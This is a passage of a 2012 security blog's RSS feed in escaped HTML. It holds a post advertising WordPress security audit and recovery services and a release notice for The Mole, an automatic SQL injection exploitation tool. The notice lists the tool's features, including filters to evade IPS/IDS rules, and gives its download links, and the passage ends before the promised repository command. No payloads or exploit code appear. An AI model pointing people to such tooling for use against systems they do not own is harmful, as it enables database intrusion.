&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-7790614758801753686?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=btSpb0lwJHs:TJ97u42bVi8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=btSpb0lwJHs:TJ97u42bVi8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=btSpb0lwJHs:TJ97u42bVi8:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=btSpb0lwJHs:TJ97u42bVi8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=btSpb0lwJHs:TJ97u42bVi8:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/btSpb0lwJHs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/btSpb0lwJHs/how-to-create-fake-access-point.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-zkTJUn8gAl0/T1sDvVtnS9I/AAAAAAAABC0/19JNtqVu3AE/s72-c/200px-Wifi_logo.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/how-to-create-fake-access-point.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-2330175008050915625</guid><pubDate>Sat, 03 Mar 2012 18:11:00 +0000</pubDate><atom:updated>2012-03-05T10:20:27.894-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">WordPress</category><category domain="http://www.blogger.com/atom/ns#">Services</category><title>Wordpress Security &amp; Vulnerability Scanning Services</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/qUAxI7Z1B8xZpA_uwbx57-02Uls/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qUAxI7Z1B8xZpA_uwbx57-02Uls/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/qUAxI7Z1B8xZpA_uwbx57-02Uls/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qUAxI7Z1B8xZpA_uwbx57-02Uls/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/wordpress-security-vulnerability.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-hRvJrmI6BCQ/T1Jd7IwSX5I/AAAAAAAABCs/aYCvbJpT1kk/s200/wordpress-security-lock-300x300.png" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Wordpress is one of the best and most popular content management system (CMS), since wordpress is famous and open source that is why hackers usually target wordpress software's and the websites / blogs that are using wordpress. Hackers normally use an innocent blogs for their bad purposes like malware spreading, phishing and other attack so it is always good to secure your website before a hacker exploit it.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Wordpress security plugins are not enough because plugins itself contain several vulnerabilities and sometimes an attacker take advantages of the plugins to hack into a wordpress software. The famous attack like timthumb script &lt;a href="http://www.ehacking.net/search/label/Vulnerability" style="color: blue;" target="_blank"&gt;vulnerability&lt;/a&gt; and blackhole exploit kit. &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Since Ethical &lt;a href="http://www.ehacking.net/search/label/Hacking" style="color: blue;" target="_blank"&gt;hacking&lt;/a&gt; means to secure a technology that is why we have several packages  to secure the wordpress and web server security.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Wordpress Security Audit&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;
&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;If you don't want to be the next victim of the hackers then find the vulnerabilities on your website before hackers find it. Website hacking is very common and there are hundreds of thousands websites are hacked everyday. So make sure that you will not be the next victim.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Wordpress Security Audit is the basic wordpress security package that can tell you about your wordpress security and weaknesses.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Wordpress Security Shield &lt;/u&gt;&lt;/span&gt; &lt;/h3&gt;&lt;br /&gt;
&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Your wordpress website might contain so many vulnerabilities that an attacker can exploit to hack into your website and the wordpress security audit can tell you about those vulnerabilities but your website must not have these vulnerabilities so you need to remove it and you need to make sure that your website is secure.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Wordpress security shield is the right package to secure your wordpress website, this package is also known as Wordpress Security Audit Plus.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;b&gt;Wordpress Bullet Proof Security&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;
&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Wordpress bullet proof security or wordpress security shield plus is the package to ensure the best security for your website. If you want to protect your website from password based attack, SQL injection, Cross site scripting and others application level attack then Wordpress bullet proof security is the best package for you.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Wordpress Secure Installation &amp;amp; Security Configuration&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;
&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;If you have not installed wordpress on your web server yet or if you want to start your own blog based on wordpress, in both cases the wordpress secure installation package will help you. In this package we will install a wordpress software with respect to the security point of view, we configure our own scripts and other plugins with basic SEO and other necessary plugins or training.  &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;b&gt;Hacked Wordpress Website Recovery&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;  &lt;/h3&gt;&lt;br /&gt;
&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;If an attacker has previously hacked your website and insert their malware then you need qiuck recovery, this package is to recover the hacked website, remove the possible backdoor, spamming codes and any other sort of malware. Security configuration for future.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-weight: normal; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;The complete detail with prize will be deliver upon request, kindly use the &lt;a href="http://www.ehacking.net/p/contact-us.html" style="color: blue;" target="_blank"&gt;contact form&lt;/a&gt; for more information.  &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-2330175008050915625?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ER8k6b1I6M0:nUA7FgPVIiI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ER8k6b1I6M0:nUA7FgPVIiI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ER8k6b1I6M0:nUA7FgPVIiI:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=ER8k6b1I6M0:nUA7FgPVIiI:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=ER8k6b1I6M0:nUA7FgPVIiI:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/ER8k6b1I6M0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/ER8k6b1I6M0/wordpress-security-vulnerability.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-hRvJrmI6BCQ/T1Jd7IwSX5I/AAAAAAAABCs/aYCvbJpT1kk/s72-c/wordpress-security-lock-300x300.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/wordpress-security-vulnerability.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-4762094419889595473</guid><pubDate>Fri, 02 Mar 2012 17:57:00 +0000</pubDate><atom:updated>2012-03-02T09:58:11.730-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">EH Tools</category><category domain="http://www.blogger.com/atom/ns#">SQL</category><title>The Mole(SQL Injection exploitation tool) v0.3 released </title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/aYrcRiiJiPMtHdnpMXf-9U75RMM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/aYrcRiiJiPMtHdnpMXf-9U75RMM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/aYrcRiiJiPMtHdnpMXf-9U75RMM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/aYrcRiiJiPMtHdnpMXf-9U75RMM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  A:link { so-language: zxx }
  CODE.cjk { font-family: "DejaVu Sans", monospace }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/molesql-injection-exploitation-tool-v03.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-gASE49evQsc/T1EJfQSTcTI/AAAAAAAABCU/4t06NCZTGgs/s200/the_mole_logo.png" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;The Mole is an automatic &lt;a href="http://www.ehacking.net/search/label/SQL?&amp;amp;max-results=3" target="_blank"&gt;&lt;span style="color: blue;"&gt;SQL Injection&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt; exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique. The &lt;a href="http://www.ehacking.net/2011/12/mole-automatic-sql-injection-sqli.html" style="color: blue;"&gt;Mole features and tutorial&lt;/a&gt; has been discussed before but the new version of Mole (v3.0) has been released and available to download.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;&lt;h3 style="color: blue;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/h3&gt;&lt;h3 align="CENTER"&gt;&lt;span style="color: blue;"&gt;&lt;span style="font-size: medium;"&gt;&lt;u&gt;&lt;b&gt;Features&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Support for injections using  Mysql, SQL Server, Postgres and Oracle databases.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Command line interface. Different  commands trigger different actions.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Auto-completion for commands,  command arguments and database, table and columns names.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Support for filters, in order to  bypass certain IPS/IDS rules using generic filters, and the  possibility of creating new ones easily.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Exploits SQL Injections through  GET/POST/Cookie parameters.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Developed in python 3.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Exploits SQL Injections that  return binary data.   &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Powerful command interpreter to simplify its usage.   &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;h3&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/h3&gt;&lt;h3 align="CENTER"&gt;&lt;span style="color: blue;"&gt;&lt;span style="font-size: medium;"&gt;&lt;u&gt;&lt;b&gt;Current Release: v0.3 (2012-03-02)&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Windows  32bit executable:&amp;nbsp;&lt;a href="http://sourceforge.net/projects/themole/files/themole-0.3/themole-0.3-win32.zip/download" target="_blank"&gt;themole-0.3-win32.zip&lt;/a&gt;  &lt;/span&gt;&lt;/b&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Tarball-gzipped  format:&amp;nbsp;&lt;a href="http://sourceforge.net/projects/themole/files/themole-0.3/themole-0.3-lin-src.tar.gz/download" target="_blank"&gt;themole-0.3-lin-src.tar.gz&lt;/a&gt;  &lt;/span&gt;&lt;/b&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Zip  format:&amp;nbsp;&lt;a href="http://sourceforge.net/projects/themole/files/themole-0.3/themole-0.3-win-src.zip/download" target="_blank"&gt;themole-0.3-win-src.zip&lt;/a&gt;  &lt;/span&gt;&lt;/b&gt;  &lt;br /&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;h3&gt;&lt;u&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Current Bug-Free version&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/h3&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Even though we want to keep the release up-to-date, it is impossible to make one for every single patch we have applied to the current version to fix a bug. We &lt;b&gt;strongly&lt;/b&gt; recommend using the &lt;b&gt;bugfix branch&lt;/b&gt; from our repository. To get it, execute:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
